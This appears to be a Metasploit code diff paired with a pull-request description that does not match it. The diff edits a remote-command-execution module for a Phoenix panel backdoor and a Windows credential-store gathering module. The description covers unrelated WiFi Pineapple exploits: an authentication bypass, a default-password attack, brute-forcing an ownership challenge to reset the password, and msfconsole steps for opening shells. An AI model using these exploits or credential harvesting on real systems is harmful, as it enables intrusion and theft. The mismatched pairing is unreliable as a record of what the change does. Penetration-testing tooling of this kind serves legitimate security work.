-        OptString.new('TARGETURI', [true, 'The path of geoip.php which is vulnerable to RCE', '/Phoenix/includes/geoip.php']),
-      ],self.class)
+        OptString.new('TARGETURI', [true, 'The path of geoip.php which is vulnerable to RCE', '/Phoenix/includes/geoip.php'])
+      ], self.class)
   end
 
   def check
     test = Rex::Text.rand_text_alpha(8)
     res = http_send_command("echo #{test};")
     if res && res.body.include?(test)
-      return Exploit::CheckCode::Vulnerable
+      Exploit::CheckCode::Vulnerable
     end
-    return Exploit::CheckCode::Safe
+    Exploit::CheckCode::Safe
   end
 
   def exploit
@@ -72,12 +72,12 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def http_send_command(cmd)
-    send_request_cgi({
+    send_request_cgi(
       'method'   => 'GET',
       'uri'      => normalize_uri(target_uri.path),
       'vars_get' => {
         'bdr' => cmd
       }
-    })
+    )
   end
 end

--- a/modules/exploits/multi/http/phoenix_exec.rb
+++ b/modules/exploits/multi/http/phoenix_exec.rb
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Author'         =>
         [
           'CrashBandicot', #initial discovery by @DosPerl
-          'Jay Turla <@shipcod3>' #msf module
+          'Jay Turla' #msf module by @shipcod3
         ],
       'References'     =>
         [

--- a/modules/exploits/multi/http/phoenix_exec.rb
+++ b/modules/exploits/multi/http/phoenix_exec.rb
@@ -61,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
     test = Rex::Text.rand_text_alpha(8)
     res = http_send_command("echo #{test};")
     if res && res.body.include?(test)
-      Exploit::CheckCode::Vulnerable
+      return Exploit::CheckCode::Vulnerable
     end
     Exploit::CheckCode::Safe
   end

--- a/modules/post/windows/gather/credentials/enum_cred_store.rb
+++ b/modules/post/windows/gather/credentials/enum_cred_store.rb
@@ -178,14 +178,25 @@ class MetasploitModule < Msf::Post
     credentials = []
     #call credenumerate to get the ptr needed
     adv32 = session.railgun.advapi32
-    ret = adv32.CredEnumerateA(nil,0,4,4)
-    p_to_arr = ret["Credentials"].unpack("V")
-    if is_86
-      count = ret["Count"]
-      arr_len = count * 4
+    begin
+      ret = adv32.CredEnumerateA(nil,0,4,4)
+    rescue Rex::Post::Meterpreter::RequestError => e
+      print_error("This module requires WinXP or higher")
+      print_error("CredEnumerateA() failed: #{e.class} #{e}")
+      ret = nil
+    end
+    if ret.nil?
+      count = 0
+      arr_len = 0
     else
-      count = ret["Count"] & 0x00000000ffffffff
-      arr_len = count * 8
+      p_to_arr = ret["Credentials"].unpack("V")
+      if is_86
+        count = ret["Count"]
+        arr_len = count * 4
+      else
+        count = ret["Count"] & 0x00000000ffffffff
+        arr_len = count * 8
+      end
     end
 
     #tell user what's going on


### PR DESCRIPTION
Adding two attacks for WiFi pineapples (versions prior to 2.4 release). These attacks affect pre-configured pineapples for slightly older firmware versions. The attacks include an authentication bypass and a brute-force for the a proof-of-ownership challenge (the flashing LEDs).

The challenge solver is in the 'pineapple_preconfig_cmdinject' exploit and this impacts two possible states: pre-password set and post-password set. The pre-password set vulnerability uses a default password and a weak anti-CSRF check to obtain shell by simply logging in and pre-computing the solution to the anti-CSRF check. The post-password set vulnerability attacks the fact there is a 1 in 27 chance of correctly guessing the challenge solution. This attack resets the password to a password chosen by the attacker (we suggest the default to decrease 'collateral' on victims) and then performs the same anti-CSRF attack as the pre-password vulnerability.

The 'pineapple_bypass_cmdinject' exploit attacks a weak check for pre-authorized files (CSS files) which allows the attacker to bypass logging in at all and then relies on the same anti-CSRF vulnerability as the above.

All exploits use a utility function in /components/system/configuration/functions.php to execute commands once authorization has been obtained or bypassed.
# Verification

All of the below require a "fresh" pineapple, flashed with version 2.0-2.3 (depending on the vulnerability being used). The default options are generally effective. You will need to be connected to the WiFi pineapple network (e.g. via WiFi or ethernet).

Assuming the above 2.3 firmware is installed, this should always work, if it does not, try again? If it still does not, write me I guess? But it's a "default" configuration bug so it should always work.
## Verify Bypass Command Injection
- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/pineapple_bypass_cmdinject`
- [ ] `exploit`
- [ ] **Verify** Command shell session x opened
## Verify Preconfig Command Injection (no password update yet)
- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/pineapple_preconfig_cmdinject`
- [ ] `exploit`
- [ ] **Verify** Command shell session x opened
## Verify Preconfig Command Injection (password already "set," we fake this below)
- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/pineapple_preconfig_cmdinject`
- [ ] `set PASSWORD badpassword`
- [ ] `exploit`
- [ ] **Verify** Exploit aborts due to failure: no-access: Failed to login PHPSESSID tospovirus with root:badpassword
- [ ] `set BRUTEFORCE true`
- [ ] `exploit`
- [ ] **Verify** LEDs should be flashing for each attempted solution the puzzle. You should see a status of "Successfully solved puzzle" which will reset the password to badpassword and obtain shell.
- [ ] **Verify** Command shell session x opened
